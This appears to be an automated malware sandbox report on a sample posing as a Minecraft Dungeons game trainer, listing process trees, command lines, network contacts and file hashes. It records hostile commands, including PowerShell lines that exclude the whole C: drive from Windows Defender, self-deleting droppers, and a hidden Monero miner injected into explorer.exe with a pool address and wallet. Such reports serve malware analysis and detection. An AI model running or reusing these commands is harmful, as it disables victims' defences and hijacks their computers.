PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 3768 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe
PID 428 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
PID 428 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe
PID 428 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe
PID 428 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
PID 428 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe C:\Users\Admin\AppData\Roaming\WindowUpdate.exe
PID 2180 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WScript.exe
PID 2180 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WScript.exe
PID 2180 wrote to memory of 1848 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WScript.exe
PID 3632 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Windows\System32\WScript.exe
PID 3632 wrote to memory of 1696 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Windows\System32\WScript.exe
PID 3632 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3632 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 768 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 2180 wrote to memory of 3004 N/A C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 3632 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\WindowUpdate.exe C:\Users\Admin\AppData\Local\Temp\MSBuild.exe
PID 1848 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1848 wrote to memory of 3052 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe
PID 3032 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\MSBuild.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

"C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe"

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Local\Temp\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

"C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

"C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe"

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

"C:\Users\Admin\AppData\Roaming\WindowUpdate.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Rtizxvdftafqcz.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\WindowUpdate.exe" -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe" -Force

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WindowUpdate.exe'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MicrosoftSecurity\MicrosoftSecurity.exe'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:14433 --user=484hzHaCUfmXhMq4nCE1wcFuQ1TVa8BPjdq5oYseNQHoDWQXS8of2U9VLnQ1cL7TVzbRVyY1Su76CAdcDdHxjXrbRbec8LG.rig1/pandalord143 --pass= --cpu-max-threads-hint=20 --donate-level=5 --cinit-idle-wait=5 --cinit-idle-cpu=80 --tls --cinit-stealth

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 356 -p 3368 -ip 3368

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3368 -s 292

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 472 -p 3368 -ip 3368

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3368 -s 296

Network

Country Destination Domain Proto
US 8.238.111.254:80 tcp
NL 8.248.7.254:80 tcp
NL 8.248.7.254:80 tcp
US 8.8.8.8:53 geo.prod.do.dsp.mp.microsoft.com udp
IE 51.104.164.114:443 geo.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 kv801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 cp801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 cp801.prod.do.dsp.mp.microsoft.com udp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
NL 184.29.205.60:443 cp801.prod.do.dsp.mp.microsoft.com tcp
US 8.8.8.8:53 gumerez.xyz udp
NL 37.0.11.77:1991 gumerez.xyz tcp
NL 37.0.11.77:1991 gumerez.xyz tcp

Files

memory/3768-130-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3768-131-0x0000000000D30000-0x0000000001252000-memory.dmp

memory/3768-132-0x0000000005CF0000-0x0000000005CF1000-memory.dmp

memory/3768-133-0x0000000007B80000-0x0000000008124000-memory.dmp

memory/3768-134-0x00000000076C0000-0x0000000007752000-memory.dmp

memory/428-135-0x0000000000400000-0x00000000009D6000-memory.dmp

memory/428-136-0x0000000074580000-0x0000000074D30000-memory.dmp

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

MD5 2ad4097e232d4002a5e90fa049607869
SHA1 9a860a3781854339d3482dd57e75a363c1bde12e
SHA256 b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66
SHA512 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277

C:\Users\Admin\AppData\Roaming\Minecraft Dungeons v1.0-v1.5.0.0 Plus 12 Trainer.exe

MD5 2ad4097e232d4002a5e90fa049607869
SHA1 9a860a3781854339d3482dd57e75a363c1bde12e
SHA256 b4ad220b7ddd80ec7127f18b9b88e96fcb6a5d4de5c0789f845ad4b8e17acd66
SHA512 5911396c485fd00a69a931333e684ee868d3dff22eec59182dc1def719a2ebb943d916b7a8929cac8d3f6ad4b948a5787040110da0cd3d234b48e73df857c277

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

MD5 2daa88a0e9da6be6cf972bdb6ebd1ed7
SHA1 c92d498fe840c676b941494fd30624ee4b91bf19
SHA256 dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c
SHA512 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c

C:\Users\Admin\AppData\Roaming\MicrosoftSecurity.exe

MD5 2daa88a0e9da6be6cf972bdb6ebd1ed7
SHA1 c92d498fe840c676b941494fd30624ee4b91bf19
SHA256 dfefe990b42699d23b3ada5b3e1c808cc27d48d69cffd6da82bbea92b12fd11c
SHA512 0dd30b775168b1c8b8f3fb7c2ee6074c0b617c344849b29d16600282c5bbe3db7a39bcd8f7e28d201b3c5ccc138cef3af3bfca527c925d83e28ddc77e154981c

memory/2180-141-0x0000000000010000-0x000000000020E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\62451199b2f6fad4f345a5c3b4d7ece0c3b458fd85adbb1e802ea122c1170128.exe.log

MD5 89367199dcebc9edec7c34f3eaf57f5f
SHA1 e344c634845a8d8fc908ceb38df15a26c3f10337
SHA256 1ddb35177c237e096d50a243a9ff8bfd8ed98921dc0ecfd1f2e941d463293f72
SHA512 6ee8b58a1d432f9ffeea9a8d9d9ad75b66f2e609402c4596fff8debc1f746f5ce695e66c1feae01d87b1803e4ccc55aa3c894f6cf5046634e12a5f7292e18131

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

MD5 50d63ac6d3d7534ab90cdebb34dd3913
SHA1 61b04d2c8caa511db49ac8305e85466cb2d3c147
SHA256 ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff
SHA512 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab

C:\Users\Admin\AppData\Roaming\WindowUpdate.exe

MD5 50d63ac6d3d7534ab90cdebb34dd3913
SHA1 61b04d2c8caa511db49ac8305e85466cb2d3c147
SHA256 ae8480f3ff00fbfe5b111e7af0ee897c3e237a53b22545f89758f86f03f1dcff
SHA512 6ba857367b150fbc38e959aea2f33a76d259dafd0d82973f13816482fa0bacde534fc6af07bbd3acef9041cf9989d0f8c7d9ae4b9e5a021c9a82a8841aadaaab

memory/2180-145-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3632-146-0x0000000000D70000-0x0000000000FCA000-memory.dmp

memory/1984-147-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/1984-149-0x00000155D44B6000-0x00000155D44B7000-memory.dmp

memory/1984-148-0x00000155D44B3000-0x00000155D44B5000-memory.dmp

memory/1984-150-0x00000155D44B0000-0x00000155D44B2000-memory.dmp

memory/3632-151-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/2180-152-0x0000000004B60000-0x0000000004B61000-memory.dmp

memory/3632-153-0x00000000018F0000-0x00000000018F2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_Snmfuhdh.vbs

MD5 41ba08c2482349cca240dab7a700c99b
SHA1 7092954d24879f12a4af640b5e4751a61b85875d
SHA256 a3d7b48a1ce8ce3d2a205c5f1a25a84e07d114a747e181e33c17ab3e28cd690b
SHA512 d3dc824461f5927ca33487ad6341fb70899c3335ae0a7de098b346d65ec0fc9873f1853e1fe99e4a499e5904f50ba9ab91186fbf59f9c9433f36affee0aef6b7

memory/1624-159-0x0000025604B10000-0x0000025604B32000-memory.dmp

memory/1624-162-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/1624-163-0x00000256030A0000-0x00000256030A2000-memory.dmp

memory/1624-164-0x00000256030A3000-0x00000256030A5000-memory.dmp

memory/1624-165-0x00000256030A6000-0x00000256030A8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

MD5 5d4073b2eb6d217c19f2b22f21bf8d57
SHA1 f0209900fbf08d004b886a0b3ba33ea2b0bf9da8
SHA256 ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3
SHA512 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159

memory/3004-168-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3004-169-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3004-166-0x0000000000400000-0x00000000007CE000-memory.dmp

memory/3032-172-0x0000000140000000-0x000000014021E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

MD5 2edd0b288fe2459da84e4274d1942343
SHA1 c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4
SHA256 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768
SHA512 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9

C:\Users\Admin\AppData\Local\Temp\MSBuild.exe

MD5 2edd0b288fe2459da84e4274d1942343
SHA1 c6d88db3c6871b3bb7f9ba9bde893bfcac7c7ee4
SHA256 6891da439a64108cc7fd7ca27f14bd726844b20c084506c13681078f5d9a3768
SHA512 6c7b06101e33001a5e345246182cc2418bef0c310c382f55ecac9826773b8e37131c1d56a34aaf144f544e3047a55867aa9f22c82c59bbacb262c20dbb5b47f9

memory/768-175-0x0000000004CB0000-0x0000000004CE6000-memory.dmp

memory/768-176-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/768-177-0x0000000004CF2000-0x0000000004CF3000-memory.dmp

memory/768-178-0x0000000004CF0000-0x0000000004CF1000-memory.dmp

memory/3032-179-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/3032-184-0x0000016C9AE80000-0x0000016C9AE82000-memory.dmp

memory/3032-185-0x0000016C9AEB0000-0x0000016C9AEC2000-memory.dmp

memory/3836-187-0x0000024EA2E00000-0x0000024EA2E02000-memory.dmp

memory/3836-186-0x00007FF807820000-0x00007FF8082E1000-memory.dmp

memory/3836-188-0x0000024EA2E03000-0x0000024EA2E05000-memory.dmp

memory/3836-192-0x0000024EA2E06000-0x0000024EA2E08000-memory.dmp

memory/768-193-0x0000000007730000-0x0000000007D58000-memory.dmp

memory/1984-196-0x00000155D44B7000-0x00000155D44B8000-memory.dmp

memory/3052-197-0x0000000074580000-0x0000000074D30000-memory.dmp

memory/3052-198-0x0000000006750000-0x0000000006751000-memory.dmp

memory/3052-199-0x0000000006752000-0x0000000006753000-memory.dmp

memory/1984-200-0x00000155D44B8000-0x00000155D44BA000-memory.dmp

memory/1984-201-0x00000155D44BA000-0x00000155D44BF000-memory.dmp

memory/3836-202-0x0000024EA2E08000-0x0000024EA2E09000-memory.dmp

memory/3052-204-0x0000000006CA0000-0x0000000006CC2000-memory.dmp

memory/3368-203-0x0000000140000000-0x0000000140758000-memory.dmp

memory/3368-205-0x0000000140000000-0x0000000140758000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22fbec4acba323d04079a263526cef3c
SHA1 eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512 fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

memory/3368-206-0x0000000140000000-0x0000000140758000-memory.dmp

memory/768-210-0x0000000007F90000-0x0000000007FF6000-memory.dmp

memory/3052-211-0x00000000075F0000-0x0000000007656000-memory.dmp

memory/768-212-0x0000000008000000-0x0000000008066000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 22fbec4acba323d04079a263526cef3c
SHA1 eb8dd0042c6a3f20087a7d2391eaf48121f98740
SHA256 020e5d769893724f075e10b01c59bf2424214cefe6aafbab6f44bc700f525c40
SHA512 fb61d737de8cbed6b7d8b5a35911c46ef26a2927a52ed7add9d594cf19dcab1b9978b61912c6f3fe4f29228f4454fb022fb2e167788c727dc6503c1fcd42159e

memory/768-214-0x00000000085C0000-0x00000000085DE000-memory.dmp

memory/768-215-0x0000000004CF5000-0x0000000004CF7000-memory.dmp

memory/3052-216-0x0000000006755000-0x0000000006757000-memory.dmp